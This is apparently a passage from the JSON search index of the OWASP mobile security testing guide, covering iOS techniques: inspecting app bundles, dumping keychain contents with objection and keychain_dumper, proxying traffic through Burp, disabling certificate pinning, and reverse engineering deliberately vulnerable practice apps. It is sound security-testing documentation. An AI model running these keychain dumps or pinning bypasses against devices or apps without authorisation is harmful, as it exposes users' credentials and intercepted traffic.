can be distributed as Swift Packages.You can view native libraries in Grapefruit by clicking on the Modules icon in the left menu bar:
And get a more detailed view including their imports/exports:
They are available in the Frameworks
folder in the IPA, you can also inspect them from the terminal:
$ ls -1 Frameworks/\nRealm.framework\nlibswiftCore.dylib\nlibswiftCoreData.dylib\nlibswiftCoreFoundation.dylib\n
or from the device with objection (as well as per SSH of course):
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... ----------------------------\nDirectory 493 None ... Realm.framework\nRegular 420 None ... libswiftCore.dylib\nRegular 420 None ... libswiftCoreData.dylib\nRegular 420 None ... libswiftCoreFoundation.dylib\n...\n
Please note that this might not be the complete list of native code elements being used by the app as some can be part of the source code, meaning that they'll be compiled in the app binary and therefore cannot be found as standalone libraries or Frameworks in the Frameworks
folder.
For now this is all information you can get about the Frameworks unless you start reverse engineering them. Refer to the chapter Tampering and Reverse Engineering on iOS for more information about how to reverse engineer Frameworks.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the Application Bundle (.app) inside the IPA as sometimes they contain additional goodies like encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0059/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore. Let's go through a short overview of the app folder structure on iOS apps to understand which data is stored where. The following illustration represents the application folder structure:
On iOS, system applications can be found in the /Applications
directory while user-installed apps are available under /private/var/containers/
. However, finding the right folder just by navigating the file system is not a trivial task as every app gets a random 128-bit UUID (Universal Unique Identifier) assigned for its directory names.
In order to easily obtain the installation directory information for user-installed apps you can use the following methods:
Connect to the terminal on the device and run the command ipainstaller
(IPA Installer Console) as follows:
iPhone:~ root# ipainstaller -l\n...\nOWASP.iGoat-Swift\n\niPhone:~ root# ipainstaller -i OWASP.iGoat-Swift\n...\nBundle: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67\nApplication: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nData: /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\n
Using objection's command env
will also show you all the directory information of the app. Connecting to the application with objection is described in the section \"Recommended Tools - Objection\".
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env\n\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nCachesDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library\n
As you can see, apps have two main locations:
/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/
)./var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/
).These folders contain information that must be examined closely during application security assessments (for example when analyzing the stored data for sensitive data).
Bundle directory:
Data directory:
NSURLIsExcludedFromBackupKey
.Application Support
and Caches
subdirectories, but the app can create custom subdirectories.NSURLIsExcludedFromBackupKey
.NSUserDefaults
can be found in this file.Let's take a closer look at iGoat-Swift's Application Bundle (.app) directory inside the Bundle directory (/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app
):
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... --------------------------------------\nRegular 420 None ... rutger.html\nRegular 420 None ... mansi.html\nRegular 420 None ... splash.html\nRegular 420 None ... about.html\n\nRegular 420 None ... LICENSE.txt\nRegular 420 None ... Sentinel.txt\nRegular 420 None ... README.txt\n\nDirectory 493 None ... URLSchemeAttackExerciseVC.nib\nDirectory 493 None ... CutAndPasteExerciseVC.nib\nDirectory 493 None ... RandomKeyGenerationExerciseVC.nib\nDirectory 493 None ... KeychainExerciseVC.nib\nDirectory 493 None ... CoreData.momd\nRegular 420 None ... archived-expanded-entitlements.xcent\nDirectory 493 None ... SVProgressHUD.bundle\n\nDirectory 493 None ... Base.lproj\nRegular 420 None ... Assets.car\nRegular 420 None ... PkgInfo\nDirectory 493 None ... _CodeSignature\nRegular 420 None ... AppIcon60x60@3x.png\n\nDirectory 493 None ... Frameworks\n\nRegular 420 None ... embedded.mobileprovision\n\nRegular 420 None ... Credentials.plist\nRegular 420 None ... Assets.plist\nRegular 420 None ... Info.plist\n\nRegular 493 None ... iGoat-Swift\n
You can also visualize the Bundle directory from Grapefruit by clicking on Finder -> Bundle:
Including the Info.plist
file:
As well as the Data directory in Finder -> Home:
Refer to the Testing Data Storage chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0060/","title":"Monitoring System Logs","text":"Many apps log informative (and potentially sensitive) messages to the console log. The log also contains crash reports and other useful information. You can collect console logs through the Xcode Devices window as follows:
To save the console output to a text file, go to the top right side of the Console window and click on the Save button.
You can also connect to the device shell as explained in Accessing the Device Shell, install socat via apt-get and run the following command:
iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock\n\n========================\nASL is here to serve you\n> watch\nOK\n\nJun 7 13:42:14 iPhone chmod[9705] <Notice>: MS:Notice: Injecting: (null) [chmod] (1556.00)\nJun 7 13:42:14 iPhone readlink[9706] <Notice>: MS:Notice: Injecting: (null) [readlink] (1556.00)\nJun 7 13:42:14 iPhone rm[9707] <Notice>: MS:Notice: Injecting: (null) [rm] (1556.00)\nJun 7 13:42:14 iPhone touch[9708] <Notice>: MS:Notice: Injecting: (null) [touch] (1556.00)\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/","title":"Dumping KeyChain Data","text":"Dumping the KeyChain data can be done with multiple tools, but not all of them will work on any iOS version. As is more often the case, try the different tools or look up their documentation for information on the latest supported versions.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#objection-jailbroken-non-jailbroken","title":"Objection (Jailbroken / non-Jailbroken)","text":"The KeyChain data can easily be viewed using Objection. First, connect objection to the app as described in \"Recommended Tools - Objection\". Then, use the ios keychain dump
command to get an overview of the keychain:
$ objection --gadget=\"iGoat-Swift\" explore\n... [usb] # ios keychain dump\n...\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------- -------------------------- ----------------------------------------------------------------------\n2019-06-06 10:53:09 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.dvia mypassword123\n2019-06-06 10:53:30 +0000 WhenUnlockedThisDeviceOnly None Password SCAPILazyVector com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password fideliusDeviceGraph com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenKey2 com.toyopagroup.picaboo 00001:FKsDMgVISiavdm70v9Fhv5z+pZfBTTN7xkwSwNvVr2IhVBqLsC7QBhsEjKMxrEjh\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenValue2 com.toyopagroup.picaboo CJ8Y8K2oE3rhOFUhnxJxDS1Zp8Z25XzgY2EtFyMbW3U=\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # quit \n
Note that currently, the latest versions of frida-server and objection do not correctly decode all keychain data. Different combinations can be tried to increase compatibility. For example, the previous printout was created with frida-tools==1.3.0
, frida==12.4.8
and objection==1.5.0
.
Finally, since the keychain dumper is executed from within the application context, it will only print out keychain items that can be accessed by the application and not the entire keychain of the iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#grapefruit-jailbroken-non-jailbroken","title":"Grapefruit (Jailbroken / non-Jailbroken)","text":"With Grapefruit it's possible to access the keychain data of the app you have selected. Inside the Storage section, click on Keychain and you can see a listing of the stored Keychain information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#keychain-dumper-jailbroken","title":"Keychain-dumper (Jailbroken)","text":"You can use Keychain-dumper to dump the jailbroken device's KeyChain contents. Once you have it running on your device:
iPhone:~ root# /tmp/keychain_dumper\n\n(...)\n\nGeneric Password\n----------------\nService: myApp\nAccount: key3\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: SmJSWxEs\n\nGeneric Password\n----------------\nService: myApp\nAccount: key7\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: WOg1DfuH\n
In newer versions of iOS (iOS 11 and up), additional steps are necessary. See the README.md for more details. Note that this binary is signed with a self-signed certificate that has a \"wildcard\" entitlement. The entitlement grants access to all items in the Keychain. If you are paranoid or have very sensitive private data on your test device, you may want to build the tool from source and manually sign the appropriate entitlements into your build; instructions for doing this are available in the GitHub repository.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0062/","title":"Basic Network Monitoring/Sniffing","text":"You can remotely sniff all traffic in real-time on iOS by creating a Remote Virtual Interface for your iOS device. First make sure you have Wireshark installed on your macOS host computer.
$ rvictl -s <UDID>\nStarting device <UDID> [SUCCEEDED] with interface rvi0\n
ip.addr == 192.168.1.1 && http\n
The documentation of Wireshark offers many examples for Capture Filters that should help you to filter the traffic to get the information you want.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/","title":"Setting up an Interception Proxy","text":"Burp Suite is an integrated platform for security testing mobile and web applications. Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web server(s). Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your iOS device and host computer are connected to a Wi-Fi network that permits client-to-client traffic. If client-to-client traffic is not permitted, you can use usbmuxd to connect to Burp via USB.
PortSwigger provides a good tutorial on setting up an iOS device to work with Burp and a tutorial on installing Burp's CA certificate to an iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/#using-burp-via-usb-on-a-jailbroken-device","title":"Using Burp via USB on a Jailbroken Device","text":"In the section Accessing the Device Shell we've already learned how we can use iproxy to use SSH via USB. When doing dynamic analysis, it's interesting to use the SSH connection to route our traffic to Burp that is running on our computer. Let's get started:
First we need to use iproxy to make SSH from iOS available on localhost.
$ iproxy 2222 22\nwaiting for connection\n
The next step is to make a remote port forwarding of port 8080 on the iOS device to the localhost interface on our computer to port 8080.
ssh -R 8080:localhost:8080 root@localhost -p 2222\n
You should now be able to reach Burp on your iOS device. Open Safari on iOS and go to 127.0.0.1:8080 and you should see the Burp Suite Page. This would also be a good time to install the CA certificate of Burp on your iOS device.
The last step would be to set the proxy globally on your iOS device:
Open Safari and go to any webpage, you should see now the traffic in Burp. Thanks @hweisheimer for the initial idea!
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't work.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-and-non-jailbroken-devices","title":"Methods for Jailbroken and Non-jailbroken Devices","text":"If you have a jailbroken device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-jailbroken device):
ios sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for iOS for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-devices-only","title":"Methods for Jailbroken Devices Only","text":"If you have a jailbroken device you can try one of the following tools that can automatically disable SSL Pinning:
Technologies and systems change over time, and some bypass techniques might eventually stop working. Hence, it's part of the tester's work to do some research, since not every tool is able to keep up with OS versions quickly enough.
Some apps might implement custom SSL pinning methods, so the tester could also develop new bypass scripts making use of existing ones as a base or inspiration and using similar techniques but targeting the app's custom APIs. Here you can inspect three good examples of such scripts:
Other Techniques:
If you don't have access to the source, you can try binary patching:
NSURLSession
, CFStream
, and AFNetworking
and methods/strings containing words like \"pinning\", \"X.509\", \"Certificate\", etc.iOS reverse engineering is a mixed bag. On one hand, apps programmed in Objective-C and Swift can be disassembled nicely. In Objective-C, object methods are called via dynamic function pointers called \"selectors\", which are resolved by name during runtime. The advantage of runtime name resolution is that these names need to stay intact in the final binary, making the disassembly more readable. Unfortunately, this also means that no direct cross-references between methods are available in the disassembler and constructing a flow graph is challenging.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0065/#references","title":"References","text":"The preferred method of statically analyzing iOS apps involves using the original Xcode project files. Ideally, you will be able to compile and debug the app to quickly identify any potential issues with the source code.
Black box analysis of iOS apps without access to the original source code requires reverse engineering. For example, no decompilers are available for iOS apps (although most commercial and open-source disassemblers can provide a pseudo-source code view of the binary), so a deep inspection requires you to read assembly code.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0067/","title":"Dynamic Analysis on iOS","text":"Life is easy with a jailbroken device: not only do you gain easy privileged access to the device, the lack of code signing allows you to use more powerful dynamic analysis techniques. On iOS, most dynamic analysis tools are based on Cydia Substrate, a framework for developing runtime patches, or Frida, a dynamic introspection tool. For basic API monitoring, you can get away with not knowing all the details of how Substrate or Frida work - you can simply use existing API monitoring tools.
On iOS, collecting basic information about a running process or an application can be slightly more challenging than on Android. On Android (or any Linux-based OS), process information is exposed as readable text files via procfs. Thus, any information about a target process can be obtained on a rooted device by parsing these text files. In contrast, on iOS there is no procfs equivalent present. Also, on iOS many standard UNIX command line tools for exploring process information, for instance lsof and vmmap, are removed to reduce the firmware size.
In this section, we will learn how to collect process information on iOS using command line tools like lsof. Since many of these tools are not present on iOS by default, we need to install them via alternative methods. For instance, lsof can be installed using Cydia (the executable is not the latest version available, but nevertheless addresses our purpose).
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/","title":"Disassembling Native Code","text":"Because Objective-C and Swift are fundamentally different, the programming language in which the app is written affects the possibilities for reverse engineering it. For example, Objective-C allows method invocations to be changed at runtime. This makes hooking into other app functions (a technique heavily used by Cycript and other reverse engineering tools) easy. This \"method swizzling\" is not implemented the same way in Swift, and the difference makes the technique harder to execute with Swift than with Objective-C.
On iOS, all the application code (both Swift and Objective-C) is compiled to machine code (e.g. ARM). Thus, to analyze iOS applications a disassembler is needed.
If you want to disassemble an application from the App Store, remove the Fairplay DRM first. Section \"Acquiring the App Binary\" in the chapter \"iOS Basic Security Testing\" explains how.
In this section the term \"app binary\" refers to the Mach-O file in the application bundle which contains the compiled code, and should not be confused with the application bundle - the IPA file. See section \"Exploring the App Package\" in chapter \"Basic iOS Security Testing\" for more details on the composition of IPA files.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/#disassembling-with-ida-pro","title":"Disassembling With IDA Pro","text":"If you have a license for IDA Pro, you can analyze the app binary using IDA Pro as well.
The free version of IDA unfortunately does not support the ARM processor type.
To get started, simply open the app binary in IDA Pro.
Upon opening the file, IDA Pro will perform auto-analysis, which can take a while depending on the size of the binary. Once the auto-analysis is completed you can browse the disassembly in the IDA View (Disassembly) window and explore functions in the Functions window, both shown in the screenshot below.
A regular IDA Pro license does not include a decompiler by default and requires an additional license for the Hex-Rays decompiler, which is expensive. In contrast, Ghidra comes with a very capable free builtin decompiler, making it a compelling alternative to use for reverse engineering.
If you have a regular IDA Pro license and do not want to buy the Hex-Rays decompiler, you can use Ghidra's decompiler by installing the GhIDA plugin for IDA Pro.
The majority of this chapter applies to applications written in Objective-C or having bridged types, which are types compatible with both Swift and Objective-C. The Swift compatibility of most tools that work well with Objective-C is being improved.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0069/","title":"Decompiling Native Code","text":"TODO. Hopper is only mentioned once in the entire document, ghidra is only used for disassembly, ... We can expand this, maybe add some good ghidra snippets for objective-c mapping, ...
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/","title":"Extracting Information from the Application Binary","text":"You can use radare to get information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#binary-information","title":"Binary Information","text":"To get information about the binary, you can use the i
command. This command will list information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
[0x1000180c8]> i\n...\nsize 0x43d5f0\nhumansz 4.2M\nmode r-x\nformat mach064\niorw false\nblock 0x100\npacket xtr.fatmach0\n...\nlang objc with blocks\nlinenum false\nlsyms false\nnx false\nos ios\npic true\nrelocs true\nsanitize false\nstatic false\nstripped true\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#classes-and-methods","title":"Classes and Methods","text":"And then we can proceed to extract information about the methods in the application's source code. To do this, we need to load the application binary into radare and then list the classes and methods in the binary.
[0x1000180c8]> icc\n\n...\n\n@interface SFAntiPiracy : NSObject\n{\n}\n+ (int) isPirated\n+ (int) isJailbroken\n+ (void) killApplication\n+ (bool) isTheDeviceJailbroken\n+ (bool) isTheApplicationCracked\n+ (bool) isTheApplicationTamperedWith\n+ (int) urlCheck\n...\n@end\n
Note the plus sign, which means that this is a class method that returns a BOOL type. A minus sign would mean that this is an instance method. Refer to later sections to understand the practical difference between these.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#linked-libraries","title":"Linked Libraries","text":"The following command lists the shared libraries:
[0x1000180c8]> il\n[Linked libraries]\n/System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguration\n/System/Library/Frameworks/StoreKit.framework/StoreKit\n/System/Library/Frameworks/Security.framework/Security\n/System/Library/Frameworks/QuartzCore.framework/QuartzCore\n/System/Library/Frameworks/MobileCoreServices.framework/MobileCoreServices\n/usr/lib/libz.1.dylib\n/System/Library/Frameworks/CoreLocation.framework/CoreLocation\n/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics\n/System/Library/Frameworks/CFNetwork.framework/CFNetwork\n/System/Library/Frameworks/AudioToolbox.framework/AudioToolbox\n/System/Library/Frameworks/CoreData.framework/CoreData\n/System/Library/Frameworks/UIKit.framework/UIKit\n/System/Library/Frameworks/Foundation.framework/Foundation\n/usr/lib/libobjc.A.dylib\n/usr/lib/libSystem.B.dylib\n/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\n\n16 libraries\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#strings","title":"Strings","text":"Obtaining strings is very useful when reverse engineering an app because it can give you a lot of information about the app's functionality. For example, you can find URLs, API endpoints, encryption keys, and more. You can also find strings that will point you to interesting functions, such as the login function or a function that checks whether the device is jailbroken.
[0x1000180c8]> izz~cstring | less\n\n\n29903 0x001d0b4c 0x1001d0b4c 5 6 5.__TEXT.__cstring ascii Admin\n29904 0x001d0b52 0x1001d0b52 13 14 5.__TEXT.__cstring ascii This!sA5Ecret\n29905 0x001d0b60 0x1001d0b60 15 16 5.__TEXT.__cstring ascii pushSuccessPage\n29906 0x001d0b70 0x1001d0b70 4 5 5.__TEXT.__cstring ascii Oops\n29907 0x001d0b75 0x1001d0b75 30 31 5.__TEXT.__cstring ascii Incorrect Username or Password\n29908 0x001d0b94 0x1001d0b94 17 18 5.__TEXT.__cstring ascii usernameTextField\n29909 0x001d0ba6 0x1001d0ba6 39 40 5.__TEXT.__cstring ascii T@\"UITextField\",&,N,V_usernameTextField\n29910 0x001d0bce 0x1001d0bce 17 18 5.__TEXT.__cstring ascii passwordTextField\n...\n29915 0x001d0ca8 0x1001d0ca8 18 19 5.__TEXT.__cstring ascii http://google.com/\n29926 0x001d0d73 0x1001d0d73 37 38 5.__TEXT.__cstring ascii Request Sent using pinning, lookout !\n29927 0x001d0d99 0x1001d0d99 77 78 5.__TEXT.__cstring ascii Certificate validation failed. \n You will have to do better than this, my boy!!\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0071/","title":"Retrieving Strings","text":"Strings are always a good starting point while analyzing a binary, as they provide context to the associated code. For instance, an error log string such as \"Cryptogram generation failed\" gives us a hint that the adjoining code might be responsible for the generation of a cryptogram.
In order to extract strings from an iOS binary, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
Ghidra can be used for analyzing the iOS binaries and obtaining cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0073/","title":"Information Gathering - API Usage","text":"The iOS platform provides many built-in libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network and location libraries. Determining the presence of these libraries in an application can give us valuable information about its underlying working.
For instance, if an application is importing the CC_SHA256
function, it indicates that the application will be performing some kind of hashing operation using the SHA256 algorithm. Further information on how to analyze iOS's cryptographic APIs is discussed in the section \"iOS Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using Bluetooth. For instance, an application performing communication using the Bluetooth channel must use functions from the Core Bluetooth framework such as CBCentralManager
or connect
. Using the iOS Bluetooth documentation you can determine the critical functions and start analysis around those function imports.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate.
Typically these domains will be present as strings within the binary of the application. One can extract domains by retrieving strings (as discussed above) or checking the strings using tools like Ghidra. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used by checking the cross-references.
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or perform further reconnaissance on domain names to know more about the target environment.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks.
Remember that in most cases, using only static analysis will not be enough and might even turn out to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interception proxy). In this section we've only touched the surface, so please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"iOS Basic Security Testing\" chapter and check out the test cases in the chapter \"iOS Network Communication\" for further information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/","title":"Reviewing Disassembled Objective-C and Swift Code","text":"In this section we will be exploring iOS application's binary code manually and perform static analysis on it. Manual analysis can be a slow process and requires immense patience. A good manual analysis can make the dynamic analysis more successful.
There are no hard written rules for performing static analysis, but there are few rules of thumb which can be used to have a systematic approach to manual analysis:
Techniques discussed in this section are generic and applicable irrespective of the tools used for analysis.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/#objective-c","title":"Objective-C","text":"In addition to the techniques learned in the \"Disassembling and Decompiling\" section, for this section you'll need some understanding of the Objective-C runtime. For instance, functions like _objc_msgSend
or _objc_release
are specially meaningful for the Objective-C runtime.
We will be using the UnCrackable App for iOS Level 1, which has the simple goal of finding a secret string hidden somewhere in the binary. The application has a single home screen and a user can interact via inputting custom strings in the provided text field.
When the user inputs the wrong string, the application shows a pop-up with the \"Verification Failed\" message.
You can keep note of the strings displayed in the pop-up, as this might be helpful when searching for the code where the input is processed and a decision is being made. Luckily, the complexity and interaction with this application is straightforward, which bodes well for our reversing endeavors.
For static analysis in this section, we will be using Ghidra 9.0.4. Ghidra 9.1_beta auto-analysis has a bug and does not show the Objective-C classes.
We can start by checking the strings present in the binary by opening it in Ghidra. The listed strings might be overwhelming at first, but with some experience in reversing Objective-C code, you'll learn how to filter and discard the strings that are not really helpful or relevant. For instance, the ones shown in screenshot below, which are generated for the Objective-C runtime. Other strings might be helpful in some cases, such as those containing symbols (function names, class names, etc.) and we'll be using them when performing static analysis to check if some specific function is being used.
If we continue our careful analysis, we can spot the string, \"Verification Failed\", which is used for the pop-up when a wrong input is given. If you follow the cross-references (Xrefs) of this string, you will reach buttonClick
function of the ViewController
class. We will look into the buttonClick
function later in this section. When further checking the other strings in the application, only a few of them look like likely candidates for a hidden flag. You can try them and verify as well.
Moving forward, we have two paths to take. Either we can start analyzing the buttonClick
function identified in the above step, or start analyzing the application from the various entry points. In a real-world situation, most of the time you will take the first path, but from a learning perspective, in this section we will take the latter path.
An iOS application calls different predefined functions provided by the iOS runtime depending on its state within the application life cycle. These functions are known as the entry points of the app. For example:
[AppDelegate application:didFinishLaunchingWithOptions:]
is called when the application is started for the first time.[AppDelegate applicationDidBecomeActive:]
is called when the application is moving from inactive to active state.Many applications execute critical code in these sections and therefore they're normally a good starting point in order to follow the code systematically.
Once we're done with the analysis of all the functions in the AppDelegate
class, we can conclude that there is no relevant code present. The lack of any code in the above functions raises the question - from where is the application's initialization code being called?
Luckily the current application has a small code base, and we can find another ViewController
class in the Symbol Tree view. In this class, the viewDidLoad
function looks interesting. If you check the documentation of viewDidLoad
, you can see that it can also be used to perform additional initialization on views.
If we check the decompilation of this function, there are a few interesting things going on. For instance, there is a call to a native function at line 31 and a label is initialized with a setHidden
flag set to 1 in lines 27-29. You can keep a note of these observations and continue exploring the other functions in this class. For brevity, exploring the other parts of the function is left as an exercise for the readers.
In our first step, we observed that the application verifies the input string only when the UI button is pressed. Thus, analyzing the buttonClick
function is an obvious target. As earlier mentioned, this function also contains the string we see in the pop-ups. At line 29 a decision is being made, which is based on the result of isEqualString
(output saved in uVar1
at line 23). The input for the comparison is coming from the text input field (from the user) and the value of the label
. Therefore, we can assume that the hidden flag is stored in that label.
Now we have followed the complete flow and have all the information about the application flow. We also concluded that the hidden flag is present in a text label and in order to determine the value of the label, we need to revisit the viewDidLoad
function, and understand what is happening in the native function identified. Analysis of the native function is discussed in \"Reviewing Disassembled Native Code\".
Analyzing disassembled native code requires a good understanding of the calling conventions and instructions used by the underlying platform. In this section we are looking in ARM64 disassembly of the native code. A good starting point to learn about ARM architecture is available at Introduction to ARM Assembly Basics by Azeria Labs Tutorials. This is a quick summary of the things that we will be using in this section:
As mentioned above, Objective-C code is also compiled to native binary code, but analyzing C/C++ native code can be more challenging. In the case of Objective-C there are various symbols (especially function names) present, which ease the understanding of the code. In the above section we've learned that the presence of function names like setText
, isEqualStrings
can help us in quickly understanding the semantics of the code. In the case of C/C++ native code, if all the binaries are stripped, there can be very few or no symbols present to assist us in analyzing it.
Decompilers can help us in analyzing native code, but they should be used with caution. Modern decompilers are very sophisticated and among many techniques used by them to decompile code, a few of them are heuristics based. Heuristics based techniques might not always give correct results, one such case being, determining the number of input parameters for a given native function. Having knowledge of analyzing disassembled code, assisted with decompilers can make analyzing native code less error prone.
We will be analyzing the native function identified in viewDidLoad
function in the previous section. The function is located at offset 0x1000080d4. The return value of this function is used in the setText
function call for the label. This text is used to compare against the user input. Thus, we can be sure that this function will be returning a string or equivalent.
The first thing we can see in the disassembly of the function is that there is no input to the function. The registers X0-X7 are not read throughout the function. Also, there are multiple calls to other functions like the ones at 0x100008158, 0x10000dbf0 etc.
The instructions corresponding to one such function calls can be seen below. The branch instruction bl
is used to call the function at 0x100008158.
1000080f0 1a 00 00 94 bl FUN_100008158\n1000080f4 60 02 00 39 strb w0,[x19]=>DAT_10000dbf0\n
The return value from the function (found in W0), is stored to the address in register X19 (strb
stores a byte to the address in register). We can see the same pattern for the other function calls: the returned value is stored in the X19 register, and each time the offset is one more than in the previous function call. This behavior can be associated with populating each index of a string array one at a time. Each return value is written to an index of this string array. There are 11 such calls, and from the current evidence we can make an intelligent guess that the length of the hidden flag is 11. Towards the end of the disassembly, the function returns with the address to this string array.
100008148 e0 03 13 aa mov x0=>DAT_10000dbf0,x19\n
To determine the value of the hidden flag we need to know the return value of each of the subsequent function calls identified above. When analyzing the function 0x100006fb4, we can observe that this function is much bigger and more complex than the previous one we analyzed. Function graphs can be very helpful when analyzing complex functions, as they help in better understanding the control flow of the function. Function graphs can be obtained in Ghidra by clicking the Display function graph icon in the sub-menu.
Manually analyzing all the native functions completely will be time consuming and might not be the wisest approach. In such a scenario using a dynamic analysis approach is highly recommended. For instance, by using techniques like hooking or simply debugging the application, we can easily determine the returned values. Normally it's a good idea to use a dynamic analysis approach and then fall back to manually analyzing the functions in a feedback loop. This way you can benefit from both approaches at the same time while saving time and reducing effort. Dynamic analysis techniques are discussed in the \"Dynamic Analysis\" section.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0078/","title":"Automated Static Analysis","text":"Several automated tools for analyzing iOS apps are available; most of them are commercial tools. The free and open source tools MobSF and objection have some static and dynamic analysis functionality. Additional tools are listed in the \"Static Source Code Analysis\" section of the \"Testing Tools\" chapter.
Don't shy away from using automated scanners for your analysis - they help you pick low-hanging fruit and allow you to focus on the more interesting aspects of analysis, such as the business logic. Keep in mind that static analyzers may produce false positives and false negatives; always review the findings carefully.
